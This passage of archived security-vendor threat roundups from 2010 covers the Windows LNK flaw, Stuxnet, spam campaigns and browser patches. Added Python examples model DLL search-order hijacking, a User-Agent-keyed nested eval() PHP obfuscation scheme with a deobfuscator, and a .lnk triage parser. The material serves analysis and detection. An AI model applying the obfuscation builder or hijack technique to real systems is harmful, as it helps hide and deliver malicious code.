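    """Directory the DLL is loaded from, or None if the load fails."""
    for d in search_order(app_dir, cwd, safe_mode, exclude_cwd):
        if dll.lower() in {f.lower() for f in FS.get(d, set())}:
            return d
    return None


def hijackable(dll, app_dir, cwd, **kw):
    """True when the DLL the app asks for would be loaded from the attacker's CWD."""
    return resolve(dll, app_dir, cwd, **kw) == cwd


if __name__ == "__main__":
    # Victim double-clicks quarterly.ppt on the share, so CWD becomes the share.
    for dll in ("shipped.dll", "sysonly.dll", "helper.dll"):
        for safe in (True, False):
            print(f"{dll:12} safe_mode={safe!s:5} -> {resolve(dll, APP_DIR, SHARE, safe)}")
        print(f"{dll:12} CWD excluded      -> {resolve(dll, APP_DIR, SHARE, exclude_cwd=True)}")
```

The point the model makes: a DLL the application ships with can never be hijacked this way, a DLL that exists only in System32 is safe under SafeDllSearchMode but not under the legacy order, and a "helper" DLL that exists nowhere on the system is loaded from the document's directory in both modes unless the current directory is taken out of the search.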

iPhone Web drive-by exploit
Usually when we talk about drive-by exploits, it goes without saying that we're referring to something bad that is to be avoided. But what about people who intentionally try to get exploited by a drive-by, whether they understand it in those terms or not? Yes, we're talking about the much-hyped JailbreakMe Web site for Apple's iOS. All you need to do is open the browser on your iOS device (iPad, iPhone, etc.) and visit the Web site; with just one click (or "swipe" on the touch interface) the Web site jailbreaks your device using a browser-delivered exploit. The broader food for thought here is that whereas this Web site prompts for your permission to run an exploit on your device and do things the owner consents to, the fact that this is technically possible (our research) in the first place opens the door to malicious Web sites that do not have to prompt you for permission before doing things to your device that you do not consent to.

In other news, watch out for malicious fake YouTube pages and malicious links that show up in Bing search results, both of which can lead to rogue or fake anti-virus software.

 

Web 2 dot uh oh

This month saw a huge increase in the number of abused and fake accounts being used for spam propagation, such as the fake Friendster.com accounts that were created over the course of a few days (blogged about here).

The threat of Web spam seems more real than ever as Web 2.0 and social networking sites become ever more popular. Another way to put it: it is here to stay.

 

Browser and friends

At the Black Hat USA 2010 conference, researcher Charlie Miller presented an exploitable vulnerability in Adobe Reader. Adobe delivered an out-of-cycle patch in the middle of August for that vulnerability (CVE-2010-2862) and another critical one. Adobe also released two further security updates this month: one for Flash Player, which fixed six critical vulnerabilities, and one for Shockwave Player.

 

A security update for QuickTime was released in early August to plug a hole that allowed arbitrary code execution. At the end of August, a 0-day vulnerability in Apple's QuickTime player was discovered; the flaw affected the latest version of QuickTime (7.67.75.0), and an alert was published here.

 

Google released Google Chrome 5.0.375.127 with patches for nine security holes, and paid $10,011 in rewards to the researchers who reported the bugs.

Opera released the Opera 10.61 update, which fixed three vulnerabilities.

 

Microsoft

Microsoft had to ship an out-of-band update to patch the LNK vulnerability discovered last month. One week later, Microsoft had a record Patch Tuesday: 14 bulletins patching 34 vulnerabilities, eight of them critical. The patches covered Windows, Microsoft Office, Internet Explorer, SQL and Silverlight.

Microsoft is not alone in the game, though: Adobe also had to patch 10 critical vulnerabilities in Flash Player, Flash Media Server, and ColdFusion.

 

Hello ThreatSeeker. You've got mail!

This month in the email space saw some of the usual suspects come around again. Spoofed Microsoft emails tried to get users to download a spam bot executable by claiming they needed to patch their systems against a dangerous 0-day attack. We also saw a large spike in malicious spam whose varied, personalized-looking subject lines served as a social engineering trick to entice recipients to open malicious attachments.

For attackers, every day is tax day, and they continued their tax-themed social engineering tricks. Variants in this campaign warned of under-reported income or notified recipients of a higher tax bracket; the messages carried either a link to a malicious executable or a malicious attachment.

Perhaps the most interesting trend this month was the range of brands being impersonated in spam. The technique itself is nothing new, but the way it was used was: these messages carried malicious links that downloaded and installed rogue AV software on victims' computers, whereas most rogue AV campaigns have relied on black-hat SEO as their attack vector.


Security Trends

60GB of account data for social networking sites, bank accounts, credit card numbers, and intercepted emails were stolen by a mini ZeuS botnet dubbed Mumba. Thirty-three percent of the infected users are in the U.S., followed by 17 percent in Germany and 7 percent in Spain.

The first SMS Trojan for Android, detected as Trojan-SMS.AndroidOS.FakePlayer.a, is spreading in Russia. For now the Trojan only causes losses for Russian users (it sends SMS messages to premium-rate numbers), and as far as we can tell it is not being spread via the Android Market.

Researchers found a rather interesting PHP injection. The injected script uses the request's User-Agent header as the deobfuscation key, and it contains multiple nested eval() calls, each of which uses a different deobfuscation key, so the file on disk cannot be decoded without knowing which browser the attacker expects to send.
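To show why that design defeats static scanning, here is an added example (not the injected script the researchers found, and not Websense code) that models the scheme in Python and pairs it with an analyst-side peeler. The stage layout, the name of the script's XOR helper x(), the payload and the key strings are all constructed for illustration; the real script's exact syntax is not on this page.

```python
"""Model of a User-Agent-keyed, multi-layer eval() injection and an analyst-side peeler.

Added example, not the injected script itself. Everything below (stage syntax,
x() helper name, keys, payload, User-Agent) is constructed for illustration.
"""
import base64
import re
from itertools import cycle


def xor(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the usual 'encryption' in injections of this kind."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def stage(key_expr: str, blob: str) -> str:
    """One layer of the injected script: set $k, decode a blob with it, eval() the result."""
    return f'$k={key_expr};eval(x(base64_decode("{blob}"),$k));'


def wrap(payload: str, inner_keys: list, user_agent: str) -> str:
    """Attacker side: nest the payload in len(inner_keys)+1 eval() layers.

    Only the outermost layer is keyed by the visiting client's User-Agent; each
    inner layer carries its own literal key, readable only once the layer
    above it has been decoded correctly.
    """
    text = payload
    for key in reversed(inner_keys):                 # innermost layer first
        blob = base64.b64encode(xor(text.encode(), key.encode())).decode()
        text = stage(f'"{key}"', blob)
    blob = base64.b64encode(xor(text.encode(), user_agent.encode())).decode()
    return stage('$_SERVER["HTTP_USER_AGENT"]', blob)


STAGE_RE = re.compile(
    r'\$k=(\$_SERVER\["HTTP_USER_AGENT"\]|"([^"]*)");'
    r'eval\(x\(base64_decode\("([A-Za-z0-9+/=]+)"\),\$k\)\);'
)


def peel(source: str, user_agent: str, max_depth: int = 16):
    """Analyst side: unwrap every eval() layer, supplying the User-Agent the
    script expects. Returns (final_text, keys_used). A wrong User-Agent turns
    the first layer into noise, so no inner key can be recovered from it.
    """
    keys = []
    for _ in range(max_depth):
        m = STAGE_RE.fullmatch(source.strip())
        if not m:
            return source, keys                      # no further layer to unwrap
        key = user_agent if m.group(2) is None else m.group(2)
        keys.append(key)
        source = xor(base64.b64decode(m.group(3)), key.encode()).decode("latin-1")
    return source, keys


def plausible_php(text: str) -> bool:
    """Cheap sanity check that a decoded layer is code rather than XOR noise."""
    return text.isprintable() and text.rstrip().endswith(";")


def looks_injected(php_source: str) -> bool:
    """Static triage for the shape: eval() fed from base64 and keyed by User-Agent."""
    return ("eval(" in php_source and "base64_decode(" in php_source
            and "HTTP_USER_AGENT" in php_source)


# Constructed sample: two inner keys plus the User-Agent key on the outside.
PAYLOAD = 'echo "<!-- constructed payload: an iframe would be injected here -->";'
INNER_KEYS = ["k1-constructed", "k2-constructed"]
UA = "Mozilla/5.0 (Windows NT 6.1) constructed-ua"
INJECTED = wrap(PAYLOAD, INNER_KEYS, UA)

if __name__ == "__main__":
    print("injected:", INJECTED[:80], "...")
    print("flagged by static triage:", looks_injected(INJECTED))
    text, keys = peel(INJECTED, UA)
    print("with the right User-Agent:", keys, "->", text)
    text, keys = peel(INJECTED, "curl/7.19.7")
    print("with the wrong User-Agent: plausible PHP?", plausible_php(text))
```

Practical consequence for incident response: a copy of the infected file alone is not enough to see what it does; you also need the User-Agent string the attacker's crawler or victim browser sends, which usually means pulling it from the Web server's access logs for the requests that hit the injected page.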

The United States edition of the second annual International Barometer published by Panda Security showed that 46 percent of U.S. small- and medium-sized businesses (SMBs) have fallen victim to cybercrime, up two percent from last year's survey. The group surveyed nearly 10,000 SMBs around the globe and more than 1,500 in the United States.

Identity thieves are targeting innocent companies with good reputations in order to obtain valid code-signing certificates in those companies' names and hand them to malware authors. The scams involved deliberately make it very difficult for a certificate authority to verify that a request really comes from the company it names. This should give us all serious concern about the trustworthiness of code signing in general.
 
This month's roundup contributors:

  • Saeed Abu-Nimeh
  • Lei Li
  • Ulysses Wang
  • Chris Astacio
  • Amon Sanniez
  • Matthew Mors
  • Jay Liew


Jay Liew

This Month in the Threat Webscape - July 2010
Posted: 12 Aug 2010 11:49 AM

Month of July
This month the world saw the Microsoft Windows LNK shortcut flaw bring a smile to black hat hackers running Stuxnet, Chymine, Vobfus, Sality and Zeus, as they quickly updated their malware to leverage the vulnerability. In addition, we'll talk about banking Trojans piggy-backing on social-networking sites, the YouTube XSS vulnerability, malicious browser add-ons, brand-jacking, and more.

Also this month, the Websense Security Lab researchers presented at Black Hat Las Vegas and Hack In The Box in Amsterdam.

Major Hits

Ever wonder where your search engine stands relative to others based on malicious links they serve up in their search results? A two-month study by Barracuda Labs provides these estimates (be careful clicking those links!). Total malware by search engine:

  • Google: 69%
  • Yahoo: 18%
  • Bing: 12%
  • Twitter: 1%

 

The Windows LNK shortcut flaw (CVE-2010-2568) made a huge splash this month, a problem exacerbated by a computer worm dubbed Stuxnet that uses this flaw as one of the worm's propagation methods. Stuxnet targets Siemens SCADA systems, used to control production at industrial plants.

 

Strictly speaking, the LNK files themselves were correctly formatted (as opposed to a file crafted to exploit a buffer overflow): they were legitimate .lnk files, except that Windows Shell would load a DLL referenced by the shortcut (to obtain its Control Panel icon) merely in order to display it -- an ugly design flaw. The bad guys simply made shortcuts that referenced their malware and sent these shortcuts around to victims. The shortcuts did not have to be clicked: merely browsing to the folder containing the malicious .lnk file in Windows Explorer triggered the bad stuff. Here is our technical analysis on the Microsoft LNK vulnerability.
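Because the malicious shortcuts are well-formed, a signature for a corrupt file will not catch them; what stands out is a shortcut that references a DLL or CPL on a non-system path. The following is an added example (not Websense's analysis tooling and not a Stuxnet sample) of a small .lnk triage parser built on that observation. The layout follows the ShellLinkHeader, LinkTargetIDList and StringData structures of the MS-SHLLINK specification; both shortcuts it inspects are constructed in build_lnk(), and the "E:\payload.dll" path is an invented stand-in for the real exploit's DLL reference.

```python
"""Triage .lnk files for the CVE-2010-2568 shape: a shortcut that makes the
shell load a DLL/CPL from an untrusted path just to render it.

Added example; the shortcuts below are constructed, not captured samples.
"""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
# StringData fields appear in this fixed order when their flag is set.
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                 (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location"))


def build_lnk(item_ids=(), relative_path=None, icon_location=None):
    """Assemble a minimal Unicode .lnk (constructed test input, not a real sample)."""
    flags, body = IS_UNICODE, b""
    if item_ids:
        flags |= HAS_IDLIST
        idlist = b"".join(struct.pack("<H", len(i) + 2) + i for i in item_ids) + b"\x00\x00"
        body += struct.pack("<H", len(idlist)) + idlist
    for flag, value in ((HAS_RELPATH, relative_path), (HAS_ICON, icon_location)):
        if value is not None:
            flags |= flag
            body += struct.pack("<H", len(value)) + value.encode("utf-16-le")
    # 76-byte header: size, CLSID, flags, then attributes/times/size/icon/show/hotkey/reserved.
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags) + bytes(52)
    return header + body


def parse_lnk(data):
    """Return flags, raw ItemID blobs and StringData fields; raise on non-LNK input."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos, item_ids, strings = 0x4C, [], {}
    if flags & HAS_IDLIST:
        size = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        end = pos + size
        while pos + 2 <= end:
            item_size = struct.unpack_from("<H", data, pos)[0]
            if item_size == 0:                       # TerminalID
                break
            item_ids.append(data[pos + 2:pos + item_size])
            pos += item_size
        pos = end
    if flags & HAS_LINKINFO:                         # skip LinkInfo using its own size field
        pos += struct.unpack_from("<I", data, pos)[0]
    for flag, name in STRING_FIELDS:
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos:pos + count * width]
            strings[name] = raw.decode("utf-16-le" if width == 2 else "latin-1")
            pos += count * width
    return {"flags": flags, "item_ids": item_ids, "strings": strings}


LOADABLE = re.compile(r"\.(dll|cpl)\b", re.IGNORECASE)
SYSTEM_DIR = re.compile(r"^(%systemroot%|c:\\windows)\\system32\\", re.IGNORECASE)


def utf16_strings(blob, min_chars=6):
    """Printable UTF-16LE runs inside raw ItemID bytes (paths live there)."""
    pattern = rb"(?:[\x20-\x7e]\x00){%d,}" % min_chars
    return [m.group().decode("utf-16-le") for m in re.finditer(pattern, blob)]


def triage(data):
    """Reasons a shortcut looks like the LNK exploit; an empty list means it looks benign.

    Heuristic: any DLL/CPL reference in the shortcut that is not under System32.
    Legitimate Control Panel shortcuts point at System32 applets.
    """
    lnk = parse_lnk(data)
    texts = list(lnk["strings"].values())
    for item in lnk["item_ids"]:
        texts.extend(utf16_strings(item))
    return [f"loads DLL/CPL from non-system path: {t}"
            for t in texts if LOADABLE.search(t) and not SYSTEM_DIR.match(t.strip())]


# Constructed samples: a normal shortcut, and one whose Control Panel ItemID
# embeds a DLL path on removable media (the exploit's shape, invented bytes).
BENIGN = build_lnk(relative_path=r".\notepad.exe",
                   icon_location=r"%SystemRoot%\system32\shell32.dll")
MALICIOUS = build_lnk(item_ids=[b"\x1f\x50" + r"E:\payload.dll".encode("utf-16-le")])

if __name__ == "__main__":
    print("benign   :", triage(BENIGN) or "nothing flagged")
    print("malicious:", triage(MALICIOUS))
```

Run it over a directory of shortcuts harvested from a share or USB stick and it will point out the ones worth a closer look; it is a heuristic, not a signature, so expect to whitelist vendor shortcuts that ship icons inside DLLs outside System32.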

 

Hot on the heels of Stuxnet, the makers of Chymine, Vobfus, Sality, and Zeus updated their unwanted products to take advantage of this vulnerability. Additional mitigation advice can be found here: US-CERT VU#940193

Web 2 dot uh oh

Last month in this section we mentioned that new ways to exploit social networks continue to surface. This month was more of the same. The RSA FraudAction Research Lab was among many to observe social sites being used to control a banking Trojan. Once the Trojan infects a user's computer, it accesses a specific social profile, Google Group, or even a Twitter feed, all set up by the controller of the Trojan. From these sites, the Trojan, written to parse text, receives instructions embedded in posts, feeds, etc. This use of social sites spares the attacker the cost and maintenance of dedicated command-and-control servers: communication with the Trojan is free and carries little risk, and it is left to the site to remove the malicious throw-away accounts.

 

The other notable exploit of Web 2.0 functionality in July was YouTube's XSS vulnerability. Many users saw its visual effects: only the top few comments on a video loaded, along with an injected script comment that was mostly regarded as spam. Fortunately, that was the extent of the exploitation before Google patched the YouTube service. Potentially it could have been used to make the browser execute malicious script code disguised in the YouTube page.

Browser and friends

Mozilla has blacklisted a third-party add-on called "Mozilla Sniffer". The add-on submitted the login form of any website, password field included, to a remote server. It had been downloaded about 1,800 times; those who installed it are advised to change their passwords in case of compromise. Mozilla also released two security updates this month, patching 15 vulnerabilities.

 

Researcher Jeremiah Grossman disclosed that the "autofill" feature in Apple Safari has a security vulnerability: a malicious page could abuse it to steal data from the user's address book. Apple responded quickly, releasing a patch a few days later. In all, 15 Safari vulnerabilities were fixed this month, including the autofill problem.

 

Google released a security update for Chrome. Five bugs were fixed in the patch.

 

The good news from Adobe is that the next version of Adobe Reader will add Protected Mode, a sandboxing technology based on Microsoft's Practical Windows Sandboxing technique and similar to the Google Chrome sandbox and Microsoft Office 2010 Protected Viewing Mode. All operations Reader needs in order to display a PDF file run with greatly restricted rights inside a confined environment. More good news: Adobe will join the Microsoft Active Protections Program (MAPP), through which vulnerability information is shared with security software providers in advance.

Microsoft

Aside from the major LNK vulnerability brouhaha covered above in the Major Hits section, Microsoft patched vulnerabilities in Windows Help and Support Center (MS10-042), the Canonical Display Driver (MS10-043), the Microsoft Office Access ActiveX controls (MS10-044), and Microsoft Office Outlook (MS10-045). The Windows Help and Support Center zero-day (MS10-042) saw at least 25,000 attacks, as confirmed by Microsoft, largely in Russia and Europe.

Hello Threatseeker. You've got mail!

This month there was a lot of follow-up on the previous month's email threats. In addition, there was no shortage or end to the abuse of social networking sites such as Facebook and hi5. The more interesting attacks in the email space focused on "brand-jacking": Gumblar seems to have made a comeback impersonating Amazon.com, with the aim of tricking unsuspecting users into visiting a URL that serves client-side exploits.

 

Other attacks included, but were not limited to, an influx of YouTube-themed spam asking users to confirm their email address, fake ImageShack registration emails, and fake "Welcome to My Opera" account activation messages.


Security Trends

A low-cost, home-brewed GSM hacking device, developed by researcher Chris Paget, mimics more expensive devices already in use by intelligence and law enforcement agencies – called IMSI catchers – that can capture phone ID data and content.

According to Secunia’s recently released report, between 2005 and 2010 Apple Inc. had the most reported security vulnerabilities.

Some motherboards in four models of Dell PowerEdge servers were shipped to customers with malware code in the embedded server management firmware. A Dell representative confirmed the issue on Dell's community forum.

A fake technical-support phone call was used to spread malware: the attackers called targeted users and "helped" them install malware, remote desktop applications and the like.

The Secunia Half Year Report 2010  asserts that a typical end-user PC with 50 installed programs had 3.5 times more vulnerabilities in the 24 third-party programs than in the 26 Microsoft programs.

 

Thanks to this month's roundup contributors:

  • Lei Li
  • Douglas Libby
  • Amon Sanniez
  • Ulysses Wang
  • Jay Liew

Jay Liew


©2013 Websense, Inc. All Rights Reserved.